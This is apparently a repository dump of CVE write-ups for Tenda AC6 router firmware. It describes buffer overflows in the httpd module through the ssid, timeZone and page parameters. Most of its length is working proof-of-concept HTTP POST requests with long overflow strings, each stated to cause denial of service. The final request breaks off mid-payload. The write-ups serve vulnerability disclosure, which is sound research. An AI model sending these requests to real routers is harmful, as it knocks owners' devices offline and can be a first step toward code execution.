* Firmware download address: https://www.tenda.com.cn/download/detail-2681.html

## Affected version

![](images/01.png)

## Vulnerability details

This vulnerability lies in the `/goform/fast_setting_wifi_set` page. The details are shown below:

![image-20221119231821046](images/02.png)

## POC

This POC can result in a DoS.

```
POST /goform/fast_setting_wifi_set HTTP/1.1
Host: 192.168.204.133
Content-Length: 1391
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.204.133
Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: password=iqb1qw; bLanguage=cn
Connection: close

ssid=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
```

![image-20221118151225120](images/03.png)

--------------------------------------------------------------------------------
/tenda_ac6/form_fast_setting_wifi_set_ssid/images/01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/form_fast_setting_wifi_set_ssid/images/01.png
--------------------------------------------------------------------------------
/tenda_ac6/form_fast_setting_wifi_set_ssid/images/02.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/form_fast_setting_wifi_set_ssid/images/02.png
--------------------------------------------------------------------------------
/tenda_ac6/form_fast_setting_wifi_set_ssid/images/03.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/form_fast_setting_wifi_set_ssid/images/03.png
--------------------------------------------------------------------------------
/tenda_ac6/form_fast_setting_wifi_set_timeZone/form_fast_setting_wifi_set_timeZone.md:
--------------------------------------------------------------------------------
# Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the timeZone parameter in the form_fast_setting_wifi_set function.

## Description

`Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling a `/goform/fast_setting_wifi_set` request.

## Firmware information

* Manufacturer's address: https://www.tenda.com.cn/

* Firmware download address: https://www.tenda.com.cn/download/detail-2681.html

## Affected version

![](images/01.png)

## Vulnerability details

This vulnerability lies in the `/goform/fast_setting_wifi_set` page. The details are shown below:

![image-20221119104721705](images/02.png)

## POC

This POC can result in a DoS.

```
POST /goform/fast_setting_wifi_set HTTP/1.1
Host: 192.168.204.133
Content-Length: 1391
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.204.133
Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: password=iqb1qw; bLanguage=cn
Connection: close

ssid=1&timeZone=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

```

![image-20221118151225120](images/03.png)

--------------------------------------------------------------------------------
/tenda_ac6/form_fast_setting_wifi_set_timeZone/images/01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/form_fast_setting_wifi_set_timeZone/images/01.png
--------------------------------------------------------------------------------
/tenda_ac6/form_fast_setting_wifi_set_timeZone/images/02.png:
--------------------------------------------------------------------------------
/tenda_ac6/fromAddressNat/fromAddressNat.md:
--------------------------------------------------------------------------------
# Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the page parameter in the fromAddressNat function.

## Description

`Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling the `/goform/addressNat` request.

## Firmware information

* Manufacturer's address: https://www.tenda.com.cn/

* Firmware download address: https://www.tenda.com.cn/download/detail-2681.html

## Affected version

![](images/01.png)

## Vulnerability details

This vulnerability lies in the `/goform/addressNat` page. The details are shown below:

![image-20221119220524008](images/02.png)

## POC

This POC can result in a DoS.

```
POST /goform/addressNat HTTP/1.1
Host: 192.168.204.133
Content-Length: 2056
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.204.133
Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: password=iqb1qw; bLanguage=cn
Connection: close

page=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa